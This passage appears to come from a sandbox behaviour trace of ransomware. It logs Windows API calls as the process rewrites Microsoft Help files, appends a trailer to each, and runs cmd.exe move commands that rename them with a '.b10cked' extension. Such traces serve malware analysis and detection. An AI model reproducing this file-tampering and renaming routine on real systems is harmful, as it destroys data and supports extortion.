lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.871] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0199.871] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.871] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x152 [0199.871] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.871] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.871] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xa8, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xa8, lpOverlapped=0x0) returned 1 [0199.873] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.873] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xa8, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xa8, lpOverlapped=0x0) returned 1 [0199.873] SetFilePointer (in: hFile=0x120, lDistanceToMove=-168, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xaa [0199.873] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xa8, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xa8, lpOverlapped=0x0) returned 1 [0199.873] SetFilePointer (in: hFile=0x120, lDistanceToMove=-168, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xaa [0199.873] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xa8, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xa8, lpOverlapped=0x0) returned 1 [0199.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.WINWORD.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0199.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.WINWORD.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x1328794, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.WINWORD.14.1033.hxn", lpUsedDefaultChar=0x0) returned 22 [0199.878] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x152 [0199.878] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0199.878] CloseHandle (hObject=0x120) returned 1 [0199.879] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~1.HXN") returned 0x27 [0199.880] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0199.880] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINWORD.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINWORD.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x89c, dwThreadId=0xde0)) returned 1 [0199.991] CloseHandle (hObject=0x1b4) returned 1 [0199.991] CloseHandle (hObject=0x120) returned 1 [0199.992] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.992] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.992] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0199.992] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.992] ReleaseMutex (hMutex=0xf8) returned 1 [0199.992] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.992] ReleaseMutex (hMutex=0xf8) returned 1 [0199.992] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.992] ReleaseMutex (hMutex=0xf8) returned 1 [0199.992] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.992] ReleaseMutex (hMutex=0xf8) returned 1 [0199.992] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0199.992] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.992] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.993] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.993] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25678183749) returned 1 [0199.993] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.993] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.993] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.993] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.993] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.993] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.993] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.993] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x16a [0199.993] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.993] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.993] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.993] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.993] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.993] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x16a [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0199.995] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.995] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x16a [0199.995] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.995] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.995] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xb4, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xb4, lpOverlapped=0x0) returned 1 [0199.996] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.996] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xb4, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xb4, lpOverlapped=0x0) returned 1 [0199.996] SetFilePointer (in: hFile=0x120, lDistanceToMove=-180, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb6 [0199.996] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xb4, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xb4, lpOverlapped=0x0) returned 1 [0199.997] SetFilePointer (in: hFile=0x120, lDistanceToMove=-180, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb6 [0199.997] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xb4, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xb4, lpOverlapped=0x0) returned 1 [0200.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.WINWORD.DEV.14.1033.hxn", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0200.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.WINWORD.DEV.14.1033.hxn", cchWideChar=26, lpMultiByteStr=0x132f75c, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.WINWORD.DEV.14.1033.hxn", lpUsedDefaultChar=0x0) returned 26 [0200.001] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x16a [0200.002] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0200.002] CloseHandle (hObject=0x120) returned 1 [0200.003] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~2.HXN") returned 0x27 [0200.003] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0200.004] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINWORD.DEV.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINWORD.DEV.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xe6c, dwThreadId=0xf20)) returned 1 [0200.029] CloseHandle (hObject=0x1b4) returned 1 [0200.029] CloseHandle (hObject=0x120) returned 1 [0200.029] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0200.029] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0200.029] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0200.029] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0200.029] ReleaseMutex (hMutex=0xf8) returned 1 [0200.029] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0200.029] ReleaseMutex (hMutex=0xf8) returned 1 [0200.029] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0200.029] ReleaseMutex (hMutex=0xf8) returned 1 [0200.029] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0200.029] ReleaseMutex (hMutex=0xf8) returned 1 [0200.029] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\nslist.hxl" (normalized: "c:\\users\\all users\\microsoft help\\nslist.hxl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0200.030] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.030] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x21d0 [0200.030] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.030] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25681962216) returned 1 [0200.030] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.031] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x21d0 [0200.031] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.031] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.031] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x21d0 [0200.031] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.031] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0200.031] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x21d0 [0200.031] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0200.031] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.031] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x21d0 [0200.031] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.032] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.032] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x21d0 [0200.032] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.032] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.032] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x21d0 [0200.032] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.032] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.032] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x21d0 [0200.033] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.033] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.033] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x21d0 [0200.033] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.033] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.033] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x21d0 [0200.033] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.033] SetFilePointer (in: hFile=0x120, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x1ce8 [0200.033] ReadFile (in: hFile=0x120, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, 